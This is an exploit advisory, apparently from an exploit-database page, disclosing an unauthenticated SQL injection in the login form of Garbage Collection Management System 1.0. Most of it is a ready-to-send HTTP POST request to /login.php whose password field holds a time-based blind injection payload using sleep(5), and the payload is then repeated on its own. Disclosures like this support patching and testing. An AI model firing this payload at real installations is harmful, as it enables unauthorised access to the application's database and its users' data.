Garbage Collection Management System 1.0 SQL Injection

2021.07.02
Credit: ircashem
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated) # Exploit Author: ircashem # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /login.php HTTP/1.1 Content-Length: 456 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075 Origin: http://localhost DNT: 1 Referer: http://localhost/ Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Connection: close -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="username" admin -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="password" admin' AND (SELECT 1 from (select sleep(5))a) -- - -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="submit" -----------------------------238993435340593308934076060075-- ########### # Payload # ########### username=admin password=admin' AND (SELECT 1 from (select sleep(5))a) -- -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top